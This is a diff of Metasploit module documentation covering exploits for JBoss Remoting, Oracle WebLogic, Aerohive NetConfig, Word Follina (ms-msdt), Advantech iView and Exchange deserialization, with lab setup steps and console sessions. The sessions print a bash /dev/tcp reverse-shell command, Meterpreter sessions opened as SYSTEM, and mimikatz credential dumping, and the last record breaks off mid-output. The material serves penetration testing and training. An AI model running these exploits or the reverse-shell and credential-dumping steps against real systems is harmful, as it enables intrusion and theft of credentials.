+&& chmod a+x $EAP_HOME/bin/*
+
+# Ensure signals are forwarded to the JVM process correctly for graceful shutdown
+#ENV LAUNCH_JBOSS_IN_BACKGROUND true
+
+# Enable binding to all network interfaces and debugging inside the EAP
+RUN echo "JAVA_OPTS=\"\$JAVA_OPTS -Djboss.bind.address=0.0.0.0 -Djboss.bind.address.management=0.0.0.0\"" >> ${EAP_HOME}/bin/run.conf
+
+# Expose the ports we're interested in
+EXPOSE 8080 9990 4447 9999 4446 3873 4445
+
+# Set the default command to run on boot
+# This will boot JBoss EAP in the standalone mode and bind to all interface
+ENTRYPOINT ["/opt/jboss/jboss-as-6.1/bin/run.sh"]
+```
+
+#### docker-compose.yml
+
+```yml
+version: "3"
+services:
+  web:
+    build: .
+    ports:
+      - "8080:8080" 
+      - "9990:9990" 
+      - "4447:4447" 
+      - "9999:9999" 
+      - "4446:4446" 
+      - "3873:3873" 
+      - "4445:4445"
+    networks:
+      internet:
+        aliases:
+          - jboss-as-61
+networks:
+    internet:
+        driver: bridge
+```
+
+```bash
+docker-compose up
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Scenarios
+
+### JBoss Application Server 6.1.0 from [Docker](#setup).
+
+```
+msf6 exploit(multi/misc/jboss_remoting_unified_invoker_rce) > options
+
+Module options (exploit/multi/misc/jboss_remoting_unified_invoker_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RHOSTS   localhost        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    4446             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.15     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(multi/misc/jboss_remoting_unified_invoker_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.15:4444
+[*] 127.0.0.1:4446 - Running automatic check ("set AutoCheck false" to disable)
+[+] 127.0.0.1:4446 - The target appears to be vulnerable.
+[*] 127.0.0.1:4446 - Executing Unix Command for cmd/unix/reverse_bash
+[+] 127.0.0.1:4446 - Successfully executed command: bash -c '0<&70-;exec 70<>/dev/tcp/192.168.1.15/4444;sh <&70 >&70 2>&70'
+[*] Command shell session 1 opened (192.168.1.15:4444 -> 192.168.1.15:65270) at 2022-07-05 00:06:09 +0200
+
+id
+uid=1000(jboss) gid=1000(jboss) groups=1000(jboss)
+pwd
+/opt/jboss
+/opt/jboss/jboss-as-6.1/bin/run.sh --version
+=========================================================================
+
+  JBoss Bootstrap Environment
+
+  JBOSS_HOME: /opt/jboss/jboss-as-6.1
+
+  JAVA: /usr/lib/jvm/java/bin/java
+
+  JAVA_OPTS: -server -Xms128m -Xmx512m -XX:MaxPermSize=256m -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -Djboss.bind.address=0.0.0.0 -Djboss.bind.address.management=0.0.0.0 -Djava.net.preferIPv4Stack=true -Dprogram.name=run.sh -Dlogging.configuration=file:/opt/jboss/jboss-as-6.1/bin/logging.properties -Djava.library.path=/opt/jboss/jboss-as-6.1/bin/native/lib64:/opt/jboss/jboss-as-6.1/bin/native/lib64
+
+  CLASSPATH: /opt/jboss/jboss-as-6.1/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar
+
+=========================================================================
+
+OpenJDK 64-Bit Server VM warning: ignoring option MaxPermSize=256m; support was removed in 8.0
+JBoss 6.1.0.Final (Build SVNTag:JBoss_6.1.0.Final date: 20110816)
+
+Distributable under LGPL license.
+See terms of license at gnu.org.
+
+exit
+[*] 127.0.0.1 - Command shell session 1 closed.
+msf6 exploit(multi/misc/jboss_remoting_unified_invoker_rce) >
+```
@@ -1,8 +1,14 @@
 ## Vulnerable Application

-CVE-2017-10271 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.  The exploit provides an unauthenticated attacker with remote arbitrary command execution.
+CVE-2019-2725 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.
+The exploit provides an unauthenticated attacker with remote arbitrary command execution.

-Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.  It is downloadable from Oracle once registered for an account.  For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`), Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).  For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`) in combination with a JDK (`jdk-8u211-windows-x64.exe`).
+Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.
+It is downloadable from Oracle once registered for an account.
+For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`),
+Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).
+For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`)
+in combination with a JDK (`jdk-8u211-windows-x64.exe`).

 ## Verification Steps

@@ -13,7 +19,10 @@ Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environ
  3. When prompted, use a development environment instead of a production environment.
  4. When prompted, keep the default port of TCP/7001.
  5. When prompted, provide a username and password, and make a note of them.
-  6. Upon completion of the installer, find and execute the admin server.  On Windows: `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
+  6. Upon completion of the installer, find and execute the admin server.
+  On Windows:
+  `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.
+  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
  7. You may be prompted for the username and password you generated during the install process.
  8. Wait for the output: `<Server state changed to RUNNING.>`

@@ -39,7 +48,8 @@ msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check

 ## Options

-  **TARGETURI** : Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`. You can also set `VHOST` instead to handle virtual hosts.
+### TARGETURI
+Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`.

 ## Scenarios

@@ -19,10 +19,9 @@ This request includes two POST parameters:
 2. The parameter that is used to execute commands via `/tmp/messages`.
 In our example the name would be `cmd`, but the module sets this to an arbitrary value.

-Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open.
-Closing the session should render the app responsive again.  It is also possible that enabling the meterpreter option
-'TryToFork` might prevent the application hang after exploitation, but given access constraints we were unable to verify the
-resultant behavior for enabling that option.  Try at your own risk (but let us know how it goes if you do).
+Upon successful exploitation, the Aerohive NetConfig application may hang for as long as the spawned shell remains open.
+If the Linux target is selected with a meterpreter payload, the `MeterpreterTryToFork` option is likely to prevent this,
+and is therefore enabled by default. If the app does hang, closing the session should render the app responsive again.

 The module provides an automatic cleanup option to clean the log.
 However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed,
@@ -0,0 +1,190 @@
+There exists a vulnerability in Microsoft Word that leverages the remote template feature to achieve remote code
+execution against the target.
+
+The vulnerability came to light after an independent cyber-security research team known as `nao_sec` uncovered a Word
+document ([05-2022-0438.doc](https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/)) that was uploaded to
+VirusTotal from an IP address in Belarus.
+
+The document uses the remote template feature to fetch an HTML document and then uses the `ms-msdt` scheme to execute
+PowerShell code.
+
+## Vulnerable Application
+
+The vulnerability has been found in Office 2013, 2016, 2019, 2021, Office ProPlus and Office 365. It also applies to
+Windows itself, e.g. it can be called from `.lnk` files and with `wget` into `PowerShell`.
+
+The vulnerability is exploitable using `.RTF` files on all versions of Office 365, including current channel.
+
+However, with Insider and Current builds of Office, it doesn't seem to work.
+
+### Make your lab
+
+You need an official version of Microsoft Office installed.
+
+Tested on Microsoft Windows 10 1909 with Microsoft Office Word 2016.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/windows/fileformat/word_msdtjs_rce`
+3. `set SRVHOST [IP]`
+4. `set LHOST [IP]`
+5. `run`
+
+## Options
+
+**CUSTOMTEMPLATE**
+
+A DOCX file that will be used as a template to build the exploit.
+
+**OBFUSCATE**
+
+Obfuscate JavaScript content. Default: true
+
+**URIPATH**
+The URI for the callback to get the payload.  Testing suggests this must be ANSI compatible and the full URI must be less than 76 characters.
+
+## Scenarios
+
+### Basic use
+
+1. Generate the exploit for docx as following.
+
+```
+[*] Started reverse TCP handler on 172.20.32.36:4444 
+[*] Using URL: http://172.20.32.36:8080/1GWqOqp7e1
+[*] Server started.
+[*] Generate a malicious docx file
+[*] Using template '/tmp/payload.docx'
+[*] Parsing item from template: docProps/
+[*] Parsing item from template: docProps/core.xml
+[*] Parsing item from template: docProps/app.xml
+[*] Parsing item from template: word/
+[*] Parsing item from template: word/theme/
+[*] Parsing item from template: word/theme/theme1.xml
+[*] Parsing item from template: word/styles.xml
+[*] Parsing item from template: word/settings.xml
+[*] Parsing item from template: word/document.xml
+[*] Parsing item from template: word/_rels/
+[*] Parsing item from template: word/_rels/document.xml.rels
+[*] Parsing item from template: word/fontTable.xml
+[*] Parsing item from template: word/webSettings.xml
+[*] Parsing item from template: _rels/
+[*] Parsing item from template: _rels/.rels
+[*] Parsing item from template: [Content_Types].xml
+[*] Injecting payload in docx document
+[*] Finalizing docx 'msf.docx'
+[+] msf.docx stored at /home/[REDACTED]/.msf4/local/msf.docx
+[*] Powershell command length: 3724
+```
+
+2. Open the DOCX document on a remote vulnerable system.
+
+```
+[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
+[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
+[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
+[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
+[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
+[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
+[*] 172.20.32.36      word_msdtjs_rce - Sending PowerShell Payload
+[*] Sending stage (200262 bytes) to 172.20.32.36
+[*] Meterpreter session 1 opened (172.20.32.36:4444 -> 172.20.32.36:42674 ) at 2022-05-30 19:32:37 +0400
+```
+
+### The 0-Click tip
+
+You can get the 0-click by either selecting the 'rtf' option in converting, manually, the `.docx` file generated by the module into a `.rtf` file format.
+
+### RTF 
+
+1. Generate the exploit for rtf as following.
+```
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > show options
+
+Module options (exploit/windows/fileformat/word_msdtjs_rce):
+
+Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
+FILENAME        msf.docx         no        The file name.
+OBFUSCATE       true             yes       Obfuscate JavaScript content.
+OUTPUT_FORMAT   docx             yes       File format to use [docx, rtf]. (Accepted: docx, rtf)
+SRVHOST         10.5.135.101     yes       The local host or network interface to listen on. This must be an address on the loca
+l machine or 0.0.0.0 to listen on all addresses.
+SRVPORT         8080             yes       The local port to listen on.
+SSL             false            no        Negotiate SSL for incoming connections
+SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+URIPATH                          no        The URI to use for this exploit (default is random)
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+LHOST                      yes       The listen address (an interface may be specified)
+LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+Id  Name
+   --  ----
+0   Microsoft Office Word
+
+
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set filename test.rtf
+filename => test.rtf
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set output_format rtf
+output_format => rtf
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set lhost 10.5.135.101
+lhost => 10.5.135.101
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set verbose true
+verbose => true
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > set disablepayloadhandler false
+disablepayloadhandler => false
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 10.5.135.101:4444
+[*] Using URL: http://10.5.135.101:8080/7eIbCn81aas277
+[*] Server started.
+[*] Generating a malicious rtf file
+[+] test.rtf stored at /home/tmoose/.msf4/local/test.rtf
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > [*] Powershell command length: 3718
+```
+
+2. Upload rtf file to remote host, make sure 'preview' is enabled, and click on the file.  (You don't need to open it, just click once to preview it)
+
+```
+[*] 10.5.132.101     word_msdtjs_rce - Sending HTML Payload
+[*] 10.5.132.101     word_msdtjs_rce - Obfuscate JavaScript content
+[*] 10.5.132.101     word_msdtjs_rce - Sending PowerShell Payload
+[*] Sending stage (200774 bytes) to 10.5.132.101
+[*] Meterpreter session 1 opened (10.5.135.101:4444 -> 10.5.132.101:51221) at 2022-08-17 10:56:01 -0500
+
+msf6 exploit(windows/fileformat/word_msdtjs_rce) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+```
+
+## References
+
+  1. <https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/>
+  2. <https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19>
+  3. <https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/>
+  4. <https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>
+  5. <https://twitter.com/GossiTheDog/status/1531608245009367040>
+  6. <https://github.com/JMousqueton/PoC-CVE-2022-30190>
@@ -0,0 +1,71 @@
+## Vulnerable Application
+
+Versions of Advantech iView software below `5.7.04.6469` are vulnerable to
+an unauthenticated command injection vulnerability via the `NetworkServlet` endpoint.
+The database backup functionality passes a user-controlled parameter, `backup_file`
+to the `mysqldump` command. The sanitization functionality only tests for SQL injection
+attempts and directory traversal, so leveraging the `-r` and `-w` `mysqldump` flags
+permits exploitation. The command injection vulnerability is used to write a
+payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM.
+
+A vulnerable version can be installed from [here](https://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-26RVVS9).
+
+Other versions of the software can be found [here](https://www.advantech.tw/support/details/firmware?id=1-HIPU-183).
+
+### Installation Instructions
+
+Distributed with the installer is a PDF containing detailed installation instructions
+for the software. Once the installation has finished, you may have issues getting the
+Tomcat service to start. If that's the case, follow the steps below (pulled from advantech_iview_unauth_rce.md):
+
+  1. Copy the msvcr100.dll file from C:\Program Files (x86)\Java\jre7\bin to C:\Program Files (x86)\iView\Apache Software Foundation\Tomcat6.0\bin.
+  2. Restart the "Apache Tomcat 6" service. 1 At this point, the application should be listening on port 8080 and no additional configuration is necessary.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/http/advantech_iview_networkservlet_cmd_inject`
+4. Do: `set RHOST <ip>`
+5. Do: `run`
+6. You should get a meterpreter session.
+
+## Options
+
+## Scenarios
+
+### Advantech iView Webserver `v5.7.04.6425` on Windows 10 21H2 x64
+
+```
+msf6 > use exploit/windows/http/advantech_iview_networkservlet_cmd_inject
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set rhost 192.168.140.197
+rhost => 192.168.140.197
+msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Using URL: http://192.168.140.1:8080/QVp4zocvVZ9f
+[*] Client 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /QVp4zocvVZ9f
+[*] Sending payload to 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
+[*] Sending stage (200774 bytes) to 192.168.140.197
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.197:50152) at 2022-07-21 16:48:57 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'webapps\iView3\vQbGQrFe.jsp' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-04M9HG7
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
@@ -1,895 +0,0 @@
-## Vulnerable Application
-
-### Description
-This vulnerability allows remote attackers to execute arbitrary code
-on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11
-prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3,
-and Exchange Server 2016 CU22 prior to Security Update 2.
-
-Note that authentication is required to exploit this vulnerability.
-
-The specific flaw exists due to the fact that the deny list for the
-ChainedSerializationBinder had a typo whereby an entry was typo'd as
-`System.Security.ClaimsPrincipal` instead of the proper value of
-`System.Security.Claims.ClaimsPrincipal`.
-
-By leveraging this vulnerability, attacks can bypass the
-`ChainedSerializationBinder`'s deserialization deny list
-and execute code as `NT AUTHORITY\SYSTEM`.
-
-Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,
-and Exchange Server 2016 CU22 SU0 on Windows Server 2016.
-
-### Setup
-
-1. Set up a version of Windows Server 2019.
-2. Download Exchange Server 2019 CU11 SU0 from https://download.microsoft.com/download/5/3/e/53e75dbd-ca33-496a-bd23-1d861feaa02a/ExchangeServer2019-x64-CU11.ISO
-3. Follow the guide at https://petri.com/how-to-install-active-directory-in-windows-server-2019-server-manager to turn
-the server into an AD server.
-4. Mount the ISO and run `Setup.exe`. It should prompt you install .NET Framework, Visual Studio C++ Redistributables,
-and Unified Communications Managed API. Install these and then reboot.
-5. Follow https://www.nucleustechnologies.com/blog/step-by-step-guide-to-install-exchange-server-2019-part-1/ and
-install the required features.
-6. Keep running `Setup.exe` and installing extra dependencies as needed as per the links.
-7. When you do get all dependencies installed, Exchange should give a button called `Install` which should no longer be
-greyed out. Press this to install and accept any warnings that appear.
-8. Go to https://*ip here*/owa/ and make sure you can see the Exchange Outlook login page.
-
-## Verification Steps
-
-1. Follow [Setup](#setup) to set up a vulnerable target.
-2. `msfconsole`
-3. `set RHOST <target IP address>`
-4. `set LHOST <IP for target to connect back to>`
-5. `set HttpUsername <username of OWA user to log in as>`
-6. `set HttpPassword <password for this OWA user>`
-7. Optional: `set DOMAIN <domain of OWA user>`
-8. Optional: `set VHOST <vhost of target>`
-9. `exploit`
-10. You should get a shell on the target as `NT AUTHORITY\SYSTEM` if it is vulnerable.
-
-## Targets
-
-### 0
-
-Windows Command
-
-### 1
-
-Windows Dropper
-### 2
-
-PowerShell Stager
-
-## Options
-
-### HttpUsername
-
-Set this to the OWA username. This can also be set to a valid domain username that has permissions to log into Exchange.
-
-### HttpPassword
-
-Set this to the OWA password. This can also be set to the password for a domain user that has permissions to log into Exchange.
-
-## Scenarios
-
-### Exchange Server 2016 CU22 SU0 On Windows Server 2016
-
-#### Target 0 - Windows Command
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce 
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
-RHOSTS => 172.24.104.104
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166 
-LHOST => 172.24.97.166
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.24.104.104   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (cmd/windows/powershell_reverse_tcp):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   LHOST         172.24.97.166    yes       The listen address (an interface may be speci
-                                            fied)
-   LOAD_MODULES                   no        A list of powershell modules separated by a c
-                                            omma to download over the web
-   LPORT         4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Windows Command
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started reverse TCP handler on 172.24.97.166:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs7u
-[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[*] Powershell session session 1 opened (172.24.97.166:4444 -> 172.24.104.104:8404 ) at 2022-02-22 17:27:02 -0600
-
-PS C:\windows\system32\inetsrv> whoami
-nt authority\system
-PS C:\windows\system32\inetsrv> 
-```
-
-
-#### Target 1 - Windows Dropper
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce 
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
-RHOSTS => 172.24.104.104
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166 
-LHOST => 172.24.97.166
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 1
-target => 1
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.24.104.104   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (windows/x64/meterpreter_reverse_https):
-
-   Name        Current Setting  Required  Description
-   ----        ---------------  --------  -----------
-   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, proc
-                                          ess, none)
-   EXTENSIONS                   no        Comma-separate list of extensions to load
-   EXTINIT                      no        Initialization strings for extensions
-   LHOST       172.24.97.166    yes       The local listener hostname
-   LPORT       4444             yes       The local listener port
-   LURI                         no        The HTTP Path
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   1   Windows Dropper
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started HTTPS reverse handler on https://172.24.97.166:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
-[*] Using URL: http://0.0.0.0:8080/7nZtWqPZw3Oz
-[*] Local IP: http://172.24.97.166:8080/7nZtWqPZw3Oz
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs72
-[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[*] Command Stager progress - 100.00% done (151/151 bytes)
-[*] Client 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576) requested /7nZtWqPZw3Oz
-[*] Sending payload to 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576)
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
-[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Redirecting stageless connection from /886ARUzXt2EUshWwdqdmVAWJyxlofzHG with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15'
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
-[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Attaching orphaned/stageless session...
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
-[*] Meterpreter session 2 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:34:07 -0600
-[*] Server stopped.
-
-meterpreter > load kiwi
-Loading extension kiwi...
-  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
- '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
-  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
-
-Success.
-meterpreter > creds_all
-[+] Running as SYSTEM
-[*] Retrieving all credentials
-msv credentials
-===============
-
-Username          Domain          NTLM               SHA1               DPAPI
--------          ------          ----               ----               -----
-Administrator     TESTINGDOMAIN2  373b765d01cd8aefe  220cface685ef2b97  968811261fcbaff0d
